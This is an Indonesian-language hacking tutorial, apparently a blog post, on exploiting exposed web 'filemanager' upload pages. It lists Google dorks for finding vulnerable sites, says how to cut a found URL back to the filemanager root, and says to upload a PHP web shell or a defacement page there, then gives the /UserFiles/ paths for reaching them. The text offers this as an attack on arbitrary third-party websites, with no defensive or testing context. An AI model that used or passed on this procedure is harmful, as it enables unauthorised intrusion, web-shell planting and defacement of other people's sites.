Berkas Manajer Eksploitasi

Virus ibuk Army 00:20 Eksploitasi

Dorks:

inurl: / filemanager / userfiles / filetype: pdf

inurl: /filemanager/index.html

eksploitasi:

http://www.site.com/filemanager/index.html

Ayo mulai !

terbuka google atau bing dan jenis dork inurl: / filemanager / userfiles / filetype: pdf atau

inurl: /filemanager/index.html

sekarang pilih website dari hasil pencarian

setelah mengklik url situs akan

http://www.site.com/filemanager/UserFiles/File/xyz/abc.pdf

Sekarang Hapus kata kunci setelah filemanager

sebagai contoh :

Sebelum: http://www.site.com/filemanager/UserFiles/File/xyz/abc.pdf

Setelah: http://www.site.com/filemanager/

Sekarang menemukan pilihan meng-upload di sana dan meng-upload shell atau deface halaman ada

Anda mengajukan akan meng-upload dalam direktori userfiles

Untuk Lihat shell upload atau berkas goto

http://www.site.com/UserFiles/Shell.php

http://www.site.com/UserFiles/deface.html

atau

http://www.site.com/UserFiles/directory/Shell.php

http://www.site.com/UserFiles/directory/deface.html